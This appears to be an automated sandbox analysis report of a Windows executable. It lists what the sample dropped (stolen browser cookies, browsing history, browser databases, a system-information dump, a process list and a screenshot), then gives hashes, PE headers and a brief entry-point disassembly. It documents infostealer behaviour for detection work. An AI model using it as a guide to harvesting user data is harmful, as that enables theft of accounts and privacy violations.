                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1508
                                                                                                                                                              Entropy (8bit):5.8635951059191544
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:/3IojsQQI/cw7vbTcw75cUSNdJkFlhno8vdY42FLGkPIkxkv:/PsLI/cw7vbTcw75cUS1kLhnosiHpIwo
                                                                                                                                                              MD5:A721EC782B6FC574A795210225E03DAA
                                                                                                                                                              SHA1:85AEBDB62DB8E859579A4D4A4728A1A8F147D5AD
                                                                                                                                                              SHA-256:A26B76F13BE5DEA2D90006C636D9039190E4D11C6BA82F64F81F7ADC2E9CD1EC
                                                                                                                                                              SHA-512:2AE6752CFA2E6E4C546DB1F244F0CCC225CB33213D236309DF8EB6433148A90B14814E6DE5F9C15C6FD49C6E5BBD35300E84480111E92EC252701A6E2B1B6648
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:.google.com.TRUE./.FALSE.2538097566.AEC.Ad49MVEVy5CxtQLtYrblzXz4DifLm5q80KxkAsZM0tGClBBQswyzDRIjhA...google.com.TRUE./.FALSE.2538097566.CONSENT.PENDING+494..www.google.com.TRUE./.FALSE.2538097566.DV.Uw-QAWGHFCMcQIF0XFQkBViNIwrwnRg...google.com.TRUE./.FALSE.2538097566.GOOGLE_ABUSE_EXEMPTION.ID=743584646b6d7876:TM=1691663507:C=r:IP=84.17.52.38-:S=tthyMI8Cvn5vO7C4FE_Vh3U...microsoft.com.TRUE./.FALSE.2538097566.MC1.GUID=762ed1c63ceb49b49cb46dba465abf5d&HASH=762e&LV=202308&V=4&LU=1691663513605...microsoft.com.TRUE./.FALSE.2538097566.MS0.422da71b383d453fad5f9d7c2bd69b73..dotnet.microsoft.com.TRUE./.FALSE.2538097566.MSFPC.GUID=762ed1c63ceb49b49cb46dba465abf5d&HASH=762e&LV=202308&V=4&LU=1691663513605..dotnet.microsoft.com.TRUE./.FALSE.2538097566.MicrosoftApplicationsTelemetryDeviceId.82a40d28-864b-41fe-a279-21bff0443578...google.com.TRUE./.FALSE.2538097566.SOCS.CAESHAgCEhJnd3NfMjAyMzA4MDMtMF9SQzIaAmVuIAEaBgiA0dCmBg..www.google.com.TRUE./.FALSE.2538097566._GRECAPTCHA.09AP5ubKd8Hj-yqzWSlTbHObp7d
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):33
                                                                                                                                                              Entropy (8bit):3.3835263827774313
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:OH36ovZa1e2Rn:k36yg7n
                                                                                                                                                              MD5:6B16602200BF2291D4ABD826BF4690F7
                                                                                                                                                              SHA1:D486BF073F6D6B6D5934AB25A38BBC65D70C5B67
                                                                                                                                                              SHA-256:062A6293B91661E186F89EFAB7EB86FF35BDA5025E1C09A2E7281DFE49396AC6
                                                                                                                                                              SHA-512:61E325AA21787CFBB375B522355ACC4C3519CB01C7BAE8506A2FFFEA29FFF9BAA83A16811E6FA42F2CFB4836DA3E7ABF900093F9B2BDB92B081EF9962238669F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:__MSG_extName__..__MSG_APP_NAME__
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (323), with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1404
                                                                                                                                                              Entropy (8bit):5.683388173204022
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:MEjBD78TSejBDDO8LHuyLJJLtO7Tv/O7TBrCoSQQQ1/tRYiejO7TziG:TWT7dpLHtjc7TvW7TBrC3L6tFN7TOG
                                                                                                                                                              MD5:620F4B3060FD4AE3D337F89C2EFBCA45
                                                                                                                                                              SHA1:588D54558A1BBA9FBAD05A79659D6E7A726C5078
                                                                                                                                                              SHA-256:AA51825F82CAFC1B29ABC5281C90CDE5890244411A425ED1BEBE6804C5356478
                                                                                                                                                              SHA-512:2DC27EC91E6D849F003D7F21B40D3B42CC3FE8F542AC66600789E7AEC4071CF756C58FA969AB3565D7DB5F9A6A37A1D2017A67A1399655707DFA9501801512E3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:URL: https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48..Title: Download .NET Framework 4.8 | Free official downloads..Last Visit: 2023-08-10 10:31:12.960438....URL: https://dotnet.microsoft.com/en-us/download/dotnet-framework/thank-you/net48-web-installer..Title: Download .NET Framework 4.8 Web Installer..Last Visit: 2023-08-10 10:31:16.412346....URL: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.net%2B4.8%26aqs%3Dchrome..69i57j0i512l9.1155j0j7%26sourceid%3Dchrome%26ie%3DUTF-8&q=EgRUETQmGIr50qYGIjDTg53RKJ5CzVGoPdPY4cUngt6OOoh1r4tqu7T5Hurime7T8opnINVeXdepF05VSCwyAXJaAUM..Title: https://www.google.com/search?q=.net+4.8&oq=.net+4.8&aqs=chrome..69i57j0i512l9.1155j0j7&sourceid=chrome&ie=UTF-8..Last Visit: 2023-08-10 10:31:00.640272....URL: https://www.google.com/search?q=.net+4.8&oq=.net+4.8&aqs=chrome..69i57j0i512l9.1155j0j7&sourceid=chrome&ie=UTF-8&google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D743584646b6d7876:TM%3D1691663
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):947
                                                                                                                                                              Entropy (8bit):4.222370991811923
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:1HJaqKETNxLw26McyyJfKEL3LoHcdoyJBKE1Yq3LSO3oyZL1:1HcGrw2vc9SwoHcNQr8SOT1
                                                                                                                                                              MD5:25749F99B5245CFF507A7C436CB372A5
                                                                                                                                                              SHA1:6D27E88CA32ACBAFE3273F9C43C99B1DAE2093DF
                                                                                                                                                              SHA-256:7379CC79CDDDF15A2F7CC38AACF3359BD061A633ACF181FA46FC47BE9DD8B70E
                                                                                                                                                              SHA-512:E6147991E4ABA38A7854AB5B1BDD202216F4523AFE853DF8720C3011B96C007954F3D2F21C2017D90758288C2704981B8C94C9DA0848CD0B445C6A39A5D528A5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:{.. "checksum": "1e54fbb25d92a354f7aeaf576726429e",.. "roots": {.. "bookmark_bar": {.. "children": [ ],.. "date_added": "13245924509383108",.. "date_modified": "13245924589059141",.. "guid": "00000000-0000-4000-a000-000000000002",.. "id": "1",.. "name": "Bookmarks bar",.. "type": "folder".. },.. "other": {.. "children": [ ],.. "date_added": "13245924509383117",.. "date_modified": "0",.. "guid": "00000000-0000-4000-a000-000000000003",.. "id": "2",.. "name": "Other bookmarks",.. "type": "folder".. },.. "synced": {.. "children": [ ],.. "date_added": "13245924509383122",.. "date_modified": "0",.. "guid": "00000000-0000-4000-a000-000000000004",.. "id": "3",.. "name": "Mobile bookmarks",.. "type": "folder".. }.. },.. "version": 1..}..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):94208
                                                                                                                                                              Entropy (8bit):1.2861458126645597
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:go1/8dpUXbSzTPJxz6zVucbj8Ewn7PrH944:gS/inRQVucbj8Ewn7b944
                                                                                                                                                              MD5:13A67FCABA59E4D6CE4CBC1DA50B72A8
                                                                                                                                                              SHA1:3974D2F90220322108483CEF19601AA09972C3F5
                                                                                                                                                              SHA-256:7BD3F40AE06D965E1C4E98D8EF2EEB00A18DD93F934ADF9F16BC682B63CD8927
                                                                                                                                                              SHA-512:A07327C16463A7DF4C76DC2A682E949CF898BBC2211EFA7E4F917E13DE4BB1C0C98923B8827E191BBBC2D42FF976748D3C6C86A8A5080008BD95ABC69DDD374F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 11, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):28672
                                                                                                                                                              Entropy (8bit):1.525382148408982
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:oe8To9Eapxv//u29ikqnXxa3Itq273BzkTDnw3:o3IpV//u2QZo27V
                                                                                                                                                              MD5:BAD7730F6FDE1661858D7C76366933B1
                                                                                                                                                              SHA1:7679157DBA24CF0FD2DC03AE73611B04227EF8A5
                                                                                                                                                              SHA-256:9F5A853FAB80EF233F4382B3B07412D1077AF8985222BBF701C8A824BEE22AFB
                                                                                                                                                              SHA-512:B1B1E0C534D96138F8752936776C3A7FD08100C99B04C55A0D7F22D0688868829C784C34F319A9FBC8F18F54DEFC7E7B07C9E40734C7C48882FE0BDEC3C66E5E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 5, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):147456
                                                                                                                                                              Entropy (8bit):0.7571971047177339
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:b7T18G7Tct7TMypHDiEwABBE3us7T18xG7T1kM:b/18G/ct/JiEZBBjs/18xG/1kM
                                                                                                                                                              MD5:52E68AF64F9581F138FD83031D06DFEA
                                                                                                                                                              SHA1:015F6B2B9715533E799C271AFD99F54CCD4D2921
                                                                                                                                                              SHA-256:80F130BC6008ED00AD51D9E43C117CBFC386626AF8954C0CB03D756BDA8B74EE
                                                                                                                                                              SHA-512:D2744EC27FC9237B043F000EDE964D4D3E66056BDF7B30792FAD74350568B477E2DD872C385AEED5D90A3A7A7EDC7EA0E2036CCEF8E9C3FC1A051E05100B5293
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):49152
                                                                                                                                                              Entropy (8bit):0.7876734657715041
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                              MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                              SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                              SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                              SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):612
                                                                                                                                                              Entropy (8bit):4.364659243404922
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:fhS9jpAI+C9/XQWYk+bwWRQA1dIVgAnPId:a9r1hXKk+/REVDwd
                                                                                                                                                              MD5:A2A110A4E9BD64782828BD5853B1C842
                                                                                                                                                              SHA1:989A7AD954A0342DAE910C9E97B3128F97CD37EF
                                                                                                                                                              SHA-256:54F193223CCCF74E91A1B3675A7563D93BE1557474E00540CAA052E8DDAF8211
                                                                                                                                                              SHA-512:4113B611DEA1651A229CACCD2D7FF45234AC3F2A899A7B1DA8C6B1491DDAE1CA9047EFA8EA4045EF59163CD29C91005D1FDA3C4D4B0A0E86A3E0F896D9D659F3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:User: user..IP: 84.17.52.42..Machine Type: AMD64..OS Name: Windows-10-10.0.17134..Machine Name on Network: 494126..Monitor: 1280x1024..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: Microsoft Basic Display Adapter..RAM:..+---------+---------+----------+..| Used GB | Free GB | Total GB |..+---------+---------+----------+..| 5.39 | 2.61 | 8.0 |..+---------+---------+----------+..Drives:..+-------+---------+---------+----------+..| Drive | Used GB | Free GB | Total GB |..+-------+---------+---------+----------+..| C:\ | 143.5 | 80.0 | 223.5 |..+-------+---------+---------+----------+
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18308
                                                                                                                                                              Entropy (8bit):3.3396629620981777
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:G58jPw8GIEpzk0PzoK6TuODQphRHwuHjsoboeNX8Ow+mbz/Q6b1B5Eo170p1rgLo:G58rw8GIEpzk0PzoK6TuODQphRHwuHjD
                                                                                                                                                              MD5:A190CA70F6D1328F6358BEC3AD91F46E
                                                                                                                                                              SHA1:CBD1E95CE0A24E189916114727C31611F95A526F
                                                                                                                                                              SHA-256:25B0D5992F1898EA5924AA539B3D798BBAF6748C80EB2819E7159276CDD9B9E3
                                                                                                                                                              SHA-512:32F8D4453926299BAF7D32B22568A5F061489249DD5EE0FD3A63046CB101E026D94F5BC5CEC30A622F1887C4CD36A3E21BACCA653B258E7A1719B94D050B1A86
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:+--------------------------------+--------+------+.| Name | Memory | PID |.+--------------------------------+--------+------+.| System | 0 MB | 4 |.+--------------------------------+--------+------+.| Registry | 0 MB | 88 |.+--------------------------------+--------+------+.| smss.exe | 0 MB | 304 |.+--------------------------------+--------+------+.| csrss.exe | 0 MB | 400 |.+--------------------------------+--------+------+.| wininit.exe | 0 MB | 476 |.+--------------------------------+--------+------+.| csrss.exe | 0 MB | 484 |.+--------------------------------+--------+------+.| services.exe | 0 MB | 568 |.+--------------------------------+--------+------+.| winlogon.exe | 0 MB | 576 |.+--------------------------------+--------+------+.| lsass.exe
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):654816
                                                                                                                                                              Entropy (8bit):7.9465808747481335
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:fa3ILWP9nd4qq2zIMddu61120es3b6QYOQHf4IDYhJdyO4jABD1Phu/:faYu9nd4q6MddfzlLnw4IsdSABzE
                                                                                                                                                              MD5:989CD68C8B7D8A5F1B04CB8116D50055
                                                                                                                                                              SHA1:8A2BC76047E730DEFD4102135A3CF82FD02F796C
                                                                                                                                                              SHA-256:3919F490CDFFA51898F590CBE528712F77747354F866898881FB8184D0CFABB4
                                                                                                                                                              SHA-512:3B3E04BA0BF6E9DB22B8F7C7871F9ECE8F8B14B9D34F2D6A5BE4A4C98B282B464AC46EDCD1B5400FBA415547FA593E6182E1898215DFBD18190D98EF2C2675DE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:.PNG........IHDR.............1.c.....IDATx......E.?.....*......K0+.(. ...=..{w...=}..0.T..D..d.*...`:.w.s.\@D.%.........U.fzf...3......t.oWuU*..T..aZuI.u.I..f.dnR.O.I....U0%=qRm....Sj..4~JOw.....`.`V.n.V..L....%Ur...S`Z..IQ.T+'-..+......[.......k.U7Y.Nr#.R>..I..V..'.R...rr...[uK..I..J.zk'p...8.4..f`Z..i.r|.~....86.y.9.O.|..&..."..z/....}.L8_..F...dZv.......S......8..q...>R.......}..{..{..J.8...L.*.6.@.s......*g..'.....8.~ZQ.m..D..w..R6.....}_.. *.0I..8..S.A.*.`C..n.l..~......p..'t.3..T7i.#..d[..$...'.U0%=.......k.}.t.IT.~...Y...g.....n.I.4"/...Q.+h..x...........C...`...0....p.......p..7........8z.#.....g...^.....`.`.`................1.B8....<.0...U.L........U..c`.,e.......+..]}.._e..;C...J..;..".../9.0...*A.;...p.HZ....\>......Y.pT.P9.=....=...b...!..H./m...3>.............oa.....'...d..M..I...`....Z....c.i<_A....u..X.n-[.."..7)..Zr...u...7...p....|.{.8.=..5M..`...........b..!.[.n...pQ...]...R.......&Ns.....z<.3..:.{.0.t...S7+.......]..v.,.
                                                                                                                                                              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                              Entropy (8bit):7.995235259278073
                                                                                                                                                              TrID:
                                                                                                                                                              • Win64 Executable (generic) (12005/4) 74.80%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 12.49%
                                                                                                                                                              • DOS Executable Generic (2002/1) 12.47%
                                                                                                                                                              • VXD Driver (31/22) 0.19%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                              File name:file.exe
                                                                                                                                                              File size:9'189'187 bytes
                                                                                                                                                              MD5:42ba63deb6c8bfdd80b696e533ee9f2a
                                                                                                                                                              SHA1:08b4a60367f8b4220a0d0116f57a7fcfce6ed402
                                                                                                                                                              SHA256:21137e9491dedb0adf2088857f7cff726c5864c9c263d1e50740355ab62e3fdf
                                                                                                                                                              SHA512:bf1182718f82bd34ca67ef018391ac52c09007aaf62a67c0037eb562817f206aa2e8d615055d2383cf0cc969a3610778c6aa3de254cafb9658a6748a33819c9f
                                                                                                                                                              SSDEEP:196608:IlIiOZKy0E68nFXXM7Nw77TWn8yj8UXnLAjJ88XYDwmKFpjujEptJBtKkvde+:2I50E68ZXMJw7PWn8TUMjG8XYD784itX
                                                                                                                                                              TLSH:5C96331DE6F094DEC247DAF2E2AA1C75B830F8260150D4B69624A7F16F61FE0DB9C391
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....M.d........../....#.V....................@..............................0................ ............................
                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                              Entrypoint:0x4010ed
                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                                                              DLL Characteristics:
                                                                                                                                                              Time Stamp:0x64F14D10 [Fri Sep 1 02:31:44 2023 UTC]
                                                                                                                                                              TLS Callbacks:0x41ece0
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:4
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:4
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:9ea5854395f99dfb3b55a7e476af7f9c
                                                                                                                                                              Instruction
                                                                                                                                                              push ebp
                                                                                                                                                              dec eax
                                                                                                                                                              mov ebp, esp
                                                                                                                                                              dec eax
                                                                                                                                                              sub esp, 30h
                                                                                                                                                              mov dword ptr [ebp-04h], 000000FFh
                                                                                                                                                              dec eax
                                                                                                                                                              mov eax, dword ptr [00029EADh]
                                                                                                                                                              mov dword ptr [eax], 00000001h
                                                                                                                                                              call 00007FFA3C530062h
                                                                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                                                                              nop
                                                                                                                                                              nop
                                                                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                                                                              dec eax
                                                                                                                                                              add esp, 30h
                                                                                                                                                              pop ebp
                                                                                                                                                              ret
                                                                                                                                                              push ebp
                                                                                                                                                              dec eax
                                                                                                                                                              mov ebp, esp
                                                                                                                                                              dec eax
                                                                                                                                                              sub esp, 30h
                                                                                                                                                              mov dword ptr [ebp-04h], 000000FFh
                                                                                                                                                              dec eax
                                                                                                                                                              mov eax, dword ptr [00029E7Eh]
                                                                                                                                                              mov dword ptr [eax], 00000000h
                                                                                                                                                              call 00007FFA3C530033h
                                                                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                                                                              nop
                                                                                                                                                              nop
                                                                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                                                                              dec eax
                                                                                                                                                              add esp, 30h
                                                                                                                                                              pop ebp
                                                                                                                                                              ret
                                                                                                                                                              push ebp
                                                                                                                                                              dec eax
                                                                                                                                                              mov ebp, esp
                                                                                                                                                              dec eax
                                                                                                                                                              sub esp, 000000E0h
                                                                                                                                                              dec eax
                                                                                                                                                              mov dword ptr [ebp-08h], 00000000h
                                                                                                                                                              mov dword ptr [ebp-0Ch], 00000000h
                                                                                                                                                              dec eax
                                                                                                                                                              lea eax, dword ptr [ebp-000000C0h]
                                                                                                                                                              inc ecx
                                                                                                                                                              mov eax, 00000068h
                                                                                                                                                              mov edx, 00000000h
                                                                                                                                                              dec eax
                                                                                                                                                              mov ecx, eax
                                                                                                                                                              call 00007FFA3C554846h
                                                                                                                                                              dec eax
                                                                                                                                                              mov eax, dword ptr [00029E2Ah]
                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                              test eax, eax
                                                                                                                                                              je 00007FFA3C530035h
                                                                                                                                                              dec eax
                                                                                                                                                              lea eax, dword ptr [ebp-000000C0h]
                                                                                                                                                              dec eax
                                                                                                                                                              mov ecx, eax
                                                                                                                                                              dec eax
                                                                                                                                                              mov eax, dword ptr [0003F1EBh]
                                                                                                                                                              call eax
                                                                                                                                                              dec eax
                                                                                                                                                              mov dword ptr [ebp-18h], 00000000h
                                                                                                                                                              mov dword ptr [ebp-24h], 00000030h
                                                                                                                                                              mov eax, dword ptr [ebp-24h]
                                                                                                                                                              dec eax
                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x400000xc28.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2d0000xfa8.pdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x2a7800x28.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x403000x2b0.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              .text0x10000x254c80x25600False0.4375261287625418data6.230696995826098IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .data0x270000x1400x200False0.185546875data1.06169541172863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rdata0x280000x3f000x4000False0.28070068359375data5.361792201240817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                              .eh_fram0x2c0000x40x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .pdata0x2d0000xfa80x1000False0.49169921875data5.275107219845029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
